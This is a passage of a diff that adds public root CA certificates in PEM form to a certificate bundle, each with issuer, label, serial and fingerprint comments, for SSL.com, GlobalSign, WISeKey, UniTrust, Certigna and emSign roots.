+CgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQDDC5TU0wuY29tIEVWIFJvb3QgQ2Vy +dGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIyMB4XDTE3MDUzMTE4MTQzN1oXDTQy +MDUzMDE4MTQzN1owgYIxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4G +A1UEBwwHSG91c3RvbjEYMBYGA1UECgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQD +DC5TU0wuY29tIEVWIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIy +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAjzZlQOHWTcDXtOlG2mvq +M0fNTPl9fb69LT3w23jhhqXZuglXaO1XPqDQCEGD5yhBJB/jchXQARr7XnAjssuf +OePPxU7Gkm0mxnu7s9onnQqG6YE3Bf7wcXHswxzpY6IXFJ3vG2fThVUCAtZJycxa +4bH3bzKfydQ7iEGonL3Lq9ttewkfokxykNorCPzPPFTOZw+oz12WGQvE43LrrdF9 +HSfvkusQv1vrO6/PgN3B0pYEW3p+pKk8OHakYo6gOV7qd89dAFmPZiw+B6KjBSYR +aZfqhbcPlgtLyEDhULouisv3D5oi53+aNxPN8k0TayHRwMwi8qFG9kRpnMphNQcA +b9ZhCBHqurj26bNg5U257J8UZslXWNvNh2n4ioYSA0e/ZhN2rHd9NCSFg83XqpyQ +Gp8hLH94t2S42Oim9HizVcuE0jLEeK6jj2HdzghTreyI/BXkmg3mnxp3zkyPuBQV +PWKchjgGAGYS5Fl2WlPAApiiECtoRHuOec4zSnaqW4EWG7WK2NAAe15itAnWhmMO +pgWVSbooi4iTsjQc2KRVbrcc0N6ZVTsj9CLg+SlmJuwgUHfbSguPvuUCYHBBXtSu +UDkiFCbLsjtzdFVHB3mBOagwE0TlBIqulhMlQg+5U8Sb/M3kHN48+qvWBkofZ6aY +MBzdLNvcGJVXZsb/XItW9XcCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAfBgNV +HSMEGDAWgBT5YLvU49U09rj1BoAlp3PbRmmonjAdBgNVHQ4EFgQU+WC71OPVNPa4 +9QaAJadz20ZpqJ4wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQBW +s47LCp1Jjr+kxJG7ZhcFUZh1++VQLHqe8RT6q9OKPv+RKY9ji9i0qVQBDb6Thi/5 +Sm3HXvVX+cpVHBK+Rw82xd9qt9t1wkclf7nxY/hoLVUE0fKNsKTPvDxeH3jnpaAg +cLAExbf3cqfeIg29MyVGjGSSJuM+LmOW2puMPfgYCdcDzH2GguDKBAdRUNf/ktUM +79qGn5nX67evaOI5JpS6aLe/g9Pqemc9YmeuJeVy6OLk7K4S9ksrPJ/psEDzOFSz +/bdoyNrGj1E8svuR3Bznm53htw1yj+KkxKl4+esUrMZDBcJlOSgYAsOCsp0FvmXt +ll9ldDz7CTUue5wT/RsPXcdtgTpWD8w74a8CLyKsRspGPKAcTNZEtF4uXBVmCeEm +Kf7GUmG6sXP/wwyc5WxqlD8UykAWlYTzWamsX0xhk23RO8yilQwipmdnRC652dKK +QbNmC1r7fSOl8hqw/96bg5Qu0T/fkreRrwU7ZcegbLHNYhLDkBvjJc40vG93drEQ +w/cFGsDWr3RiSBd3kmmQYRzelYB0VI8YHMPzA9C/pEN1hlMYegouCRw2n5H9gooi +S9EOUCXdywMMF8mDAAhONU2Ki+3wApRmLER/y5UnlhetCTCstnEXbosX9hwJ1C07 +mKVx01QT2WDz9UtmT/rx7iASjbSsV7FFY6GsdqnC+w== +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com EV Root Certification Authority ECC O=SSL Corporation +# Subject: CN=SSL.com EV Root Certification Authority ECC O=SSL Corporation +# Label: "SSL.com EV Root Certification Authority ECC" +# Serial: 3182246526754555285 +# MD5 Fingerprint: 59:53:22:65:83:42:01:54:c0:ce:42:b9:5a:7c:f2:90 +# SHA1 Fingerprint: 4c:dd:51:a3:d1:f5:20:32:14:b0:c6:c5:32:23:03:91:c7:46:42:6d +# SHA256 Fingerprint: 22:a2:c1:f7:bd:ed:70:4c:c1:e7:01:b5:f4:08:c3:10:88:0f:e9:56:b5:de:2a:4a:44:f9:9c:87:3a:25:a7:c8 +-----BEGIN CERTIFICATE----- +MIIClDCCAhqgAwIBAgIILCmcWxbtBZUwCgYIKoZIzj0EAwIwfzELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xNDAyBgNVBAMMK1NTTC5jb20gRVYgUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNTIzWhcNNDEwMjEyMTgx +NTIzWjB/MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjE0MDIGA1UEAwwrU1NMLmNv +bSBFViBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49 +AgEGBSuBBAAiA2IABKoSR5CYG/vvw0AHgyBO8TCCogbR8pKGYfL2IWjKAMTH6kMA +VIbc/R/fALhBYlzccBYy3h+Z1MzFB8gIH2EWB1E9fVwHU+M1OIzfzZ/ZLg1Kthku +WnBaBu2+8KGwytAJKaNjMGEwHQYDVR0OBBYEFFvKXuXe0oGqzagtZFG22XKbl+ZP +MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUW8pe5d7SgarNqC1kUbbZcpuX +5k8wDgYDVR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2gAMGUCMQCK5kCJN+vp1RPZ +ytRrJPOwPYdGWBrssd9v+1a6cGvHOMzosYxPD/fxZ3YOg9AeUY8CMD32IygmTMZg +h5Mmm7I1HrrW9zzRHM76JTymGoEVW/MSD2zuZYrJh6j5B+BimoxcSg== +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R6 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R6 +# Label: "GlobalSign Root CA - R6" +# Serial: 1417766617973444989252670301619537 +# MD5 Fingerprint: 4f:dd:07:e4:d4:22:64:39:1e:0c:37:42:ea:d1:c6:ae +# SHA1 Fingerprint: 80:94:64:0e:b5:a7:a1:ca:11:9c:1f:dd:d5:9f:81:02:63:a7:fb:d1 +# SHA256 Fingerprint: 2c:ab:ea:fe:37:d0:6c:a2:2a:ba:73:91:c0:03:3d:25:98:29:52:c4:53:64:73:49:76:3a:3a:b5:ad:6c:cf:69 +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIORea7A4Mzw4VlSOb/RVEwDQYJKoZIhvcNAQEMBQAwTDEg +MB4GA1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjYxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTQxMjEwMDAwMDAwWhcNMzQx +MjEwMDAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSNjET +MBEGA1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAJUH6HPKZvnsFMp7PPcNCPG0RQssgrRI +xutbPK6DuEGSMxSkb3/pKszGsIhrxbaJ0cay/xTOURQh7ErdG1rG1ofuTToVBu1k +ZguSgMpE3nOUTvOniX9PeGMIyBJQbUJmL025eShNUhqKGoC3GYEOfsSKvGRMIRxD +aNc9PIrFsmbVkJq3MQbFvuJtMgamHvm566qjuL++gmNQ0PAYid/kD3n16qIfKtJw +LnvnvJO7bVPiSHyMEAc4/2ayd2F+4OqMPKq0pPbzlUoSB239jLKJz9CgYXfIWHSw +1CM69106yqLbnQneXUQtkPGBzVeS+n68UARjNN9rkxi+azayOeSsJDa38O+2HBNX +k7besvjihbdzorg1qkXy4J02oW9UivFyVm4uiMVRQkQVlO6jxTiWm05OWgtH8wY2 +SXcwvHE35absIQh1/OZhFj931dmRl4QKbNQCTXTAFO39OfuD8l4UoQSwC+n+7o/h +bguyCLNhZglqsQY6ZZZZwPA1/cnaKI0aEYdwgQqomnUdnjqGBQCe24DWJfncBZ4n +WUx2OVvq+aWh2IMP0f/fMBH5hc8zSPXKbWQULHpYT9NLCEnFlWQaYw55PfWzjMpY +rZxCRXluDocZXFSxZba/jJvcE+kNb7gu3GduyYsRtYQUigAZcIN5kZeR1Bonvzce +MgfYFGM8KEyvAgMBAAGjYzBhMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBSubAWjkxPioufi1xzWx/B/yGdToDAfBgNVHSMEGDAWgBSu +bAWjkxPioufi1xzWx/B/yGdToDANBgkqhkiG9w0BAQwFAAOCAgEAgyXt6NH9lVLN +nsAEoJFp5lzQhN7craJP6Ed41mWYqVuoPId8AorRbrcWc+ZfwFSY1XS+wc3iEZGt +Ixg93eFyRJa0lV7Ae46ZeBZDE1ZXs6KzO7V33EByrKPrmzU+sQghoefEQzd5Mr61 +55wsTLxDKZmOMNOsIeDjHfrYBzN2VAAiKrlNIC5waNrlU/yDXNOd8v9EDERm8tLj +vUYAGm0CuiVdjaExUd1URhxN25mW7xocBFymFe944Hn+Xds+qkxV/ZoVqW/hpvvf +cDDpw+5CRu3CkwWJ+n1jez/QcYF8AOiYrg54NMMl+68KnyBr3TsTjxKM4kEaSHpz +oHdpx7Zcf4LIHv5YGygrqGytXm3ABdJ7t+uA/iU3/gKbaKxCXcPu9czc8FB10jZp +nOZ7BN9uBmm23goJSFmH63sUYHpkqmlD75HHTOwY3WzvUy2MmeFe8nI+z1TIvWfs +pA9MRf/TuTAjB0yPEL+GltmZWrSZVxykzLsViVO6LAUP5MSeGbEYNNVMnbrt9x+v +JJUEeKgDu+6B5dpffItKoZB0JaezPkvILFa9x8jvOOJckvB595yEunQtYQEgfn7R +8k8HWV+LLUNS60YMlOH1Zkd5d9VUWx+tJDfLRVpOoERIyNiwmcUVhAn21klJwGW4 +5hpxbqCo8YLoRT5s1gLXCmeDBVrJpBA= +-----END CERTIFICATE----- + +# Issuer: CN=OISTE WISeKey Global Root GC CA O=WISeKey OU=OISTE Foundation Endorsed +# Subject: CN=OISTE WISeKey Global Root GC CA O=WISeKey OU=OISTE Foundation Endorsed +# Label: "OISTE WISeKey Global Root GC CA" +# Serial: 44084345621038548146064804565436152554 +# MD5 Fingerprint: a9:d6:b9:2d:2f:93:64:f8:a5:69:ca:91:e9:68:07:23 +# SHA1 Fingerprint: e0:11:84:5e:34:de:be:88:81:b9:9c:f6:16:26:d1:96:1f:c3:b9:31 +# SHA256 Fingerprint: 85:60:f9:1c:36:24:da:ba:95:70:b5:fe:a0:db:e3:6f:f1:1a:83:23:be:94:86:85:4f:b3:f3:4a:55:71:19:8d +-----BEGIN CERTIFICATE----- +MIICaTCCAe+gAwIBAgIQISpWDK7aDKtARb8roi066jAKBggqhkjOPQQDAzBtMQsw +CQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUgRm91 +bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9iYWwg +Um9vdCBHQyBDQTAeFw0xNzA1MDkwOTQ4MzRaFw00MjA1MDkwOTU4MzNaMG0xCzAJ +BgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBGb3Vu +ZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2JhbCBS +b290IEdDIENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAETOlQwMYPchi82PG6s4ni +eUqjFqdrVCTbUf/q9Akkwwsin8tqJ4KBDdLArzHkdIJuyiXZjHWd8dvQmqJLIX4W +p2OQ0jnUsYd4XxiWD1AbNTcPasbc2RNNpI6QN+a9WzGRo1QwUjAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUSIcUrOPDnpBgOtfKie7T +rYy0UGYwEAYJKwYBBAGCNxUBBAMCAQAwCgYIKoZIzj0EAwMDaAAwZQIwJsdpW9zV +57LnyAyMjMPdeYwbY9XJUpROTYJKcx6ygISpJcBMWm1JKWB4E+J+SOtkAjEA2zQg +Mgj/mkkCtojeFK9dbJlxjRo/i9fgojaGHAeCOnZT/cKi7e97sIBPWA9LUzm9 +-----END CERTIFICATE----- + +# Issuer: CN=UCA Global G2 Root O=UniTrust +# Subject: CN=UCA Global G2 Root O=UniTrust +# Label: "UCA Global G2 Root" +# Serial: 124779693093741543919145257850076631279 +# MD5 Fingerprint: 80:fe:f0:c4:4a:f0:5c:62:32:9f:1c:ba:78:a9:50:f8 +# SHA1 Fingerprint: 28:f9:78:16:19:7a:ff:18:25:18:aa:44:fe:c1:a0:ce:5c:b6:4c:8a +# SHA256 Fingerprint: 9b:ea:11:c9:76:fe:01:47:64:c1:be:56:a6:f9:14:b5:a5:60:31:7a:bd:99:88:39:33:82:e5:16:1a:a0:49:3c +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIQXd+x2lqj7V2+WmUgZQOQ7zANBgkqhkiG9w0BAQsFADA9 +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxGzAZBgNVBAMMElVDQSBH +bG9iYWwgRzIgUm9vdDAeFw0xNjAzMTEwMDAwMDBaFw00MDEyMzEwMDAwMDBaMD0x +CzAJBgNVBAYTAkNOMREwDwYDVQQKDAhVbmlUcnVzdDEbMBkGA1UEAwwSVUNBIEds +b2JhbCBHMiBSb290MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxeYr +b3zvJgUno4Ek2m/LAfmZmqkywiKHYUGRO8vDaBsGxUypK8FnFyIdK+35KYmToni9 +kmugow2ifsqTs6bRjDXVdfkX9s9FxeV67HeToI8jrg4aA3++1NDtLnurRiNb/yzm +VHqUwCoV8MmNsHo7JOHXaOIxPAYzRrZUEaalLyJUKlgNAQLx+hVRZ2zA+te2G3/R +VogvGjqNO7uCEeBHANBSh6v7hn4PJGtAnTRnvI3HLYZveT6OqTwXS3+wmeOwcWDc +C/Vkw85DvG1xudLeJ1uK6NjGruFZfc8oLTW4lVYa8bJYS7cSN8h8s+1LgOGN+jIj +tm+3SJUIsUROhYw6AlQgL9+/V087OpAh18EmNVQg7Mc/R+zvWr9LesGtOxdQXGLY +D0tK3Cv6brxzks3sx1DoQZbXqX5t2Okdj4q1uViSukqSKwxW/YDrCPBeKW4bHAyv +j5OJrdu9o54hyokZ7N+1wxrrFv54NkzWbtA+FxyQF2smuvt6L78RHBgOLXMDj6Dl +NaBa4kx1HXHhOThTeEDMg5PXCp6dW4+K5OXgSORIskfNTip1KnvyIvbJvgmRlld6 +iIis7nCs+dwp4wwcOxJORNanTrAmyPPZGpeRaOrvjUYG0lZFWJo8DA+DuAUlwznP +O6Q0ibd5Ei9Hxeepl2n8pndntd978XplFeRhVmUCAwEAAaNCMEAwDgYDVR0PAQH/ +BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFIHEjMz15DD/pQwIX4wV +ZyF0Ad/fMA0GCSqGSIb3DQEBCwUAA4ICAQATZSL1jiutROTL/7lo5sOASD0Ee/oj +L3rtNtqyzm325p7lX1iPyzcyochltq44PTUbPrw7tgTQvPlJ9Zv3hcU2tsu8+Mg5 +1eRfB70VVJd0ysrtT7q6ZHafgbiERUlMjW+i67HM0cOU2kTC5uLqGOiiHycFutfl +1qnN3e92mI0ADs0b+gO3joBYDic/UvuUospeZcnWhNq5NXHzJsBPd+aBJ9J3O5oU +b3n09tDh05S60FdRvScFDcH9yBIw7m+NESsIndTUv4BFFJqIRNow6rSn4+7vW4LV +PtateJLbXDzz2K36uGt/xDYotgIVilQsnLAXc47QN6MUPJiVAAwpBVueSUmxX8fj +y88nZY41F7dXyDDZQVu5FLbowg+UMaeUmMxq67XhJ/UQqAHojhJi6IjMtX9Gl8Cb +EGY4GjZGXyJoPd/JxhMnq1MGrKI8hgZlb7F+sSlEmqO6SWkoaY/X5V+tBIZkbxqg +DMUIYs6Ao9Dz7GjevjPHF1t/gMRMTLGmhIrDO7gJzRSBuhjjVFc2/tsvfEehOjPI ++Vg7RE+xygKJBJYoaMVLuCaJu9YzL1DV/pqJuhgyklTGW+Cd+V7lDSKb9triyCGy +YiGqhkCyLmTTX8jjfhFnRR8F/uOi77Oos/N9j/gMHyIfLXC0uAE0djAA5SN4p1bX +UB+K+wb1whnw0A== +-----END CERTIFICATE----- + +# Issuer: CN=UCA Extended Validation Root O=UniTrust +# Subject: CN=UCA Extended Validation Root O=UniTrust +# Label: "UCA Extended Validation Root" +# Serial: 106100277556486529736699587978573607008 +# MD5 Fingerprint: a1:f3:5f:43:c6:34:9b:da:bf:8c:7e:05:53:ad:96:e2 +# SHA1 Fingerprint: a3:a1:b0:6f:24:61:23:4a:e3:36:a5:c2:37:fc:a6:ff:dd:f0:d7:3a +# SHA256 Fingerprint: d4:3a:f9:b3:54:73:75:5c:96:84:fc:06:d7:d8:cb:70:ee:5c:28:e7:73:fb:29:4e:b4:1e:e7:17:22:92:4d:24 +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgIQT9Irj/VkyDOeTzRYZiNwYDANBgkqhkiG9w0BAQsFADBH +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNVBAMMHFVDQSBF +eHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwHhcNMTUwMzEzMDAwMDAwWhcNMzgxMjMx +MDAwMDAwWjBHMQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNV +BAMMHFVDQSBFeHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCpCQcoEwKwmeBkqh5DFnpzsZGgdT6o+uM4AHrsiWog +D4vFsJszA1qGxliG1cGFu0/GnEBNyr7uaZa4rYEwmnySBesFK5pI0Lh2PpbIILvS +sPGP2KxFRv+qZ2C0d35qHzwaUnoEPQc8hQ2E0B92CvdqFN9y4zR8V05WAT558aop +O2z6+I9tTcg1367r3CTueUWnhbYFiN6IXSV8l2RnCdm/WhUFhvMJHuxYMjMR83dk +sHYf5BA1FxvyDrFspCqjc/wJHx4yGVMR59mzLC52LqGj3n5qiAno8geK+LLNEOfi +c0CTuwjRP+H8C5SzJe98ptfRr5//lpr1kXuYC3fUfugH0mK1lTnj8/FtDw5lhIpj +VMWAtuCeS31HJqcBCF3RiJ7XwzJE+oJKCmhUfzhTA8ykADNkUVkLo4KRel7sFsLz +KuZi2irbWWIQJUoqgQtHB0MGcIfS+pMRKXpITeuUx3BNr2fVUbGAIAEBtHoIppB/ +TuDvB0GHr2qlXov7z1CymlSvw4m6WC31MJixNnI5fkkE/SmnTHnkBVfblLkWU41G +sx2VYVdWf6/wFlthWG82UBEL2KwrlRYaDh8IzTY0ZRBiZtWAXxQgXy0MoHgKaNYs +1+lvK9JKBZP8nm9rZ/+I8U6laUpSNwXqxhaN0sSZ0YIrO7o1dfdRUVjzyAfd5LQD +fwIDAQABo0IwQDAdBgNVHQ4EFgQU2XQ65DA9DfcS3H5aBZ8eNJr34RQwDwYDVR0T +AQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYwDQYJKoZIhvcNAQELBQADggIBADaN +l8xCFWQpN5smLNb7rhVpLGsaGvdftvkHTFnq88nIua7Mui563MD1sC3AO6+fcAUR +ap8lTwEpcOPlDOHqWnzcSbvBHiqB9RZLcpHIojG5qtr8nR/zXUACE/xOHAbKsxSQ +VBcZEhrxH9cMaVr2cXj0lH2RC47skFSOvG+hTKv8dGT9cZr4QQehzZHkPJrgmzI5 +c6sq1WnIeJEmMX3ixzDx/BR4dxIOE/TdFpS/S2d7cFOFyrC78zhNLJA5wA3CXWvp +4uXViI3WLL+rG761KIcSF3Ru/H38j9CHJrAb+7lsq+KePRXBOy5nAliRn+/4Qh8s +t2j1da3Ptfb/EX3C8CSlrdP6oDyp+l3cpaDvRKS+1ujl5BOWF3sGPjLtx7dCvHaj +2GU4Kzg1USEODm8uNBNA4StnDG1KQTAYI1oyVZnJF+A83vbsea0rWBmirSwiGpWO +vpaQXUJXxPkUAzUrHC1RVwinOt4/5Mi0A3PCwSaAuwtCH60NryZy2sy+s6ODWA2C +xR9GUeOcGMyNm43sSet1UNWMKFnKdDTajAshqx7qG+XH/RU+wBeq+yNuJkbL+vmx +cmtpzyKEC2IPrNkZAJSidjzULZrtBJ4tBmIQN1IchXIbJ+XMxjHsN+xjWZsLHXbM +fjKaiJUINlK73nZfdklJrX+9ZSCyycErdhh2n1ax +-----END CERTIFICATE----- + +# Issuer: CN=Certigna Root CA O=Dhimyotis OU=0002 48146308100036 +# Subject: CN=Certigna Root CA O=Dhimyotis OU=0002 48146308100036 +# Label: "Certigna Root CA" +# Serial: 269714418870597844693661054334862075617 +# MD5 Fingerprint: 0e:5c:30:62:27:eb:5b:bc:d7:ae:62:ba:e9:d5:df:77 +# SHA1 Fingerprint: 2d:0d:52:14:ff:9e:ad:99:24:01:74:20:47:6e:6c:85:27:27:f5:43 +# SHA256 Fingerprint: d4:8d:3d:23:ee:db:50:a4:59:e5:51:97:60:1c:27:77:4b:9d:7b:18:c9:4d:5a:05:95:11:a1:02:50:b9:31:68 +-----BEGIN CERTIFICATE----- +MIIGWzCCBEOgAwIBAgIRAMrpG4nxVQMNo+ZBbcTjpuEwDQYJKoZIhvcNAQELBQAw +WjELMAkGA1UEBhMCRlIxEjAQBgNVBAoMCURoaW15b3RpczEcMBoGA1UECwwTMDAw +MiA0ODE0NjMwODEwMDAzNjEZMBcGA1UEAwwQQ2VydGlnbmEgUm9vdCBDQTAeFw0x +MzEwMDEwODMyMjdaFw0zMzEwMDEwODMyMjdaMFoxCzAJBgNVBAYTAkZSMRIwEAYD +VQQKDAlEaGlteW90aXMxHDAaBgNVBAsMEzAwMDIgNDgxNDYzMDgxMDAwMzYxGTAX +BgNVBAMMEENlcnRpZ25hIFJvb3QgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAw +ggIKAoICAQDNGDllGlmx6mQWDoyUJJV8g9PFOSbcDO8WV43X2KyjQn+Cyu3NW9sO +ty3tRQgXstmzy9YXUnIo245Onoq2C/mehJpNdt4iKVzSs9IGPjA5qXSjklYcoW9M +CiBtnyN6tMbaLOQdLNyzKNAT8kxOAkmhVECe5uUFoC2EyP+YbNDrihqECB63aCPu +I9Vwzm1RaRDuoXrC0SIxwoKF0vJVdlB8JXrJhFwLrN1CTivngqIkicuQstDuI7pm +TLtipPlTWmR7fJj6o0ieD5Wupxj0auwuA0Wv8HT4Ks16XdG+RCYyKfHx9WzMfgIh +C59vpD++nVPiz32pLHxYGpfhPTc3GGYo0kDFUYqMwy3OU4gkWGQwFsWq4NYKpkDf +ePb1BHxpE4S80dGnBs8B92jAqFe7OmGtBIyT46388NtEbVncSVmurJqZNjBBe3Yz +IoejwpKGbvlw7q6Hh5UbxHq9MfPU0uWZ/75I7HX1eBYdpnDBfzwboZL7z8g81sWT +Co/1VTp2lc5ZmIoJlXcymoO6LAQ6l73UL77XbJuiyn1tJslV1c/DeVIICZkHJC1k +JWumIWmbat10TWuXekG9qxf5kBdIjzb5LdXF2+6qhUVB+s06RbFo5jZMm5BX7CO5 +hwjCxAnxl4YqKE3idMDaxIzb3+KhF1nOJFl0Mdp//TBt2dzhauH8XwIDAQABo4IB +GjCCARYwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FBiHVuBud+4kNTxOc5of1uHieX4rMB8GA1UdIwQYMBaAFBiHVuBud+4kNTxOc5of +1uHieX4rMEQGA1UdIAQ9MDswOQYEVR0gADAxMC8GCCsGAQUFBwIBFiNodHRwczov +L3d3d3cuY2VydGlnbmEuZnIvYXV0b3JpdGVzLzBtBgNVHR8EZjBkMC+gLaArhilo +dHRwOi8vY3JsLmNlcnRpZ25hLmZyL2NlcnRpZ25hcm9vdGNhLmNybDAxoC+gLYYr +aHR0cDovL2NybC5kaGlteW90aXMuY29tL2NlcnRpZ25hcm9vdGNhLmNybDANBgkq +hkiG9w0BAQsFAAOCAgEAlLieT/DjlQgi581oQfccVdV8AOItOoldaDgvUSILSo3L +6btdPrtcPbEo/uRTVRPPoZAbAh1fZkYJMyjhDSSXcNMQH+pkV5a7XdrnxIxPTGRG +HVyH41neQtGbqH6mid2PHMkwgu07nM3A6RngatgCdTer9zQoKJHyBApPNeNgJgH6 +0BGM+RFq7q89w1DTj18zeTyGqHNFkIwgtnJzFyO+B2XleJINugHA64wcZr+shncB +lA2c5uk5jR+mUYyZDDl34bSb+hxnV29qao6pK0xXeXpXIs/NX2NGjVxZOob4Mkdi +o2cNGJHc+6Zr9UhhcyNZjgKnvETq9Emd8VRY+WCv2hikLyhF3HqgiIZd8zvn/yk1 +gPxkQ5Tm4xxvvq0OKmOZK8l+hfZx6AYDlf7ej0gcWtSS6Cvu5zHbugRqh5jnxV/v +faci9wHYTfmJ0A6aBVmknpjZbyvKcL5kwlWj9Omvw5Ip3IgWJJk8jSaYtlu3zM63 +Nwf9JtmYhST/WSMDmu2dnajkXjjO11INb9I/bbEFa0nOipFGc/T2L/Coc3cOZayh +jWZSaX5LaAzHHjcng6WMxwLkFM1JAbBzs/3GkDpv0mztO+7skb6iQ12LAEpmJURw +3kAP+HwV96LOPNdeE4yBFxgX0b3xdxA61GU5wSesVywlVP+i2k+KYTlerj1KjL0= +-----END CERTIFICATE----- + +# Issuer: CN=emSign Root CA - G1 O=eMudhra Technologies Limited OU=emSign PKI +# Subject: CN=emSign Root CA - G1 O=eMudhra Technologies Limited OU=emSign PKI +# Label: "emSign Root CA - G1" +# Serial: 235931866688319308814040 +# MD5 Fingerprint: 9c:42:84:57:dd:cb:0b:a7:2e:95:ad:b6:f3:da:bc:ac +# SHA1 Fingerprint: 8a:c7:ad:8f:73:ac:4e:c1:b5:75:4d:a5:40:f4:fc:cf:7c:b5:8e:8c +# SHA256 Fingerprint: 40:f6:af:03:46:a9:9a:a1:cd:1d:55:5a:4e:9c:ce:62:c7:f9:63:46:03:ee:40:66:15:83:3d:c8:c8:d0:03:67 +-----BEGIN CERTIFICATE----- +MIIDlDCCAnygAwIBAgIKMfXkYgxsWO3W2DANBgkqhkiG9w0BAQsFADBnMQswCQYD +VQQGEwJJTjETMBEGA1UECxMKZW1TaWduIFBLSTElMCMGA1UEChMcZU11ZGhyYSBU +ZWNobm9sb2dpZXMgTGltaXRlZDEcMBoGA1UEAxMTZW1TaWduIFJvb3QgQ0EgLSBH +MTAeFw0xODAyMTgxODMwMDBaFw00MzAyMTgxODMwMDBaMGcxCzAJBgNVBAYTAklO +MRMwEQYDVQQLEwplbVNpZ24gUEtJMSUwIwYDVQQKExxlTXVkaHJhIFRlY2hub2xv +Z2llcyBMaW1pdGVkMRwwGgYDVQQDExNlbVNpZ24gUm9vdCBDQSAtIEcxMIIBIjAN +BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAk0u76WaK7p1b1TST0Bsew+eeuGQz +f2N4aLTNLnF115sgxk0pvLZoYIr3IZpWNVrzdr3YzZr/k1ZLpVkGoZM0Kd0WNHVO +8oG0x5ZOrRkVUkr+PHB1cM2vK6sVmjM8qrOLqs1D/fXqcP/tzxE7lM5OMhbTI0Aq +d7OvPAEsbO2ZLIvZTmmYsvePQbAyeGHWDV/D+qJAkh1cF+ZwPjXnorfCYuKrpDhM +tTk1b+oDafo6VGiFbdbyL0NVHpENDtjVaqSW0RM8LHhQ6DqS0hdW5TUaQBw+jSzt +Od9C4INBdN+jzcKGYEho42kLVACL5HZpIQ15TjQIXhTCzLG3rdd8cIrHhQIDAQAB +o0IwQDAdBgNVHQ4EFgQU++8Nhp6w492pufEhF38+/PB3KxowDgYDVR0PAQH/BAQD +AgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAFn/8oz1h31x +PaOfG1vR2vjTnGs2vZupYeveFix0PZ7mddrXuqe8QhfnPZHr5X3dPpzxz5KsbEjM +wiI/aTvFthUvozXGaCocV685743QNcMYDHsAVhzNixl03r4PEuDQqqE/AjSxcM6d +GNYIAwlG7mDgfrbESQRRfXBgvKqy/3lyeqYdPV8q+Mri/Tm3R7nrft8EI6/6nAYH +6ftjk4BAtcZsCjEozgyfz7MjNYBBjWzEN3uBL4ChQEKF6dk4jeihU80Bv2noWgby +RQuQ+q7hv53yrlc8pa6yVvSLZUDp/TGBLPQ5Cdjua6e0ph0VpZj3AYHYhX3zUVxx +iN66zB+Afko= +-----END CERTIFICATE----- + +# Issuer: CN=emSign ECC Root CA - G3 O=eMudhra Technologies Limited OU=emSign PKI +# Subject: CN=emSign ECC Root CA - G3 O=eMudhra Technologies Limited OU=emSign PKI +# Label: "emSign ECC Root CA - G3" +# Serial: 287880440101571086945156 +# MD5 Fingerprint: ce:0b:72:d1:9f:88:8e:d0:50:03:e8:e3:b8:8b:67:40 +# SHA1 Fingerprint: 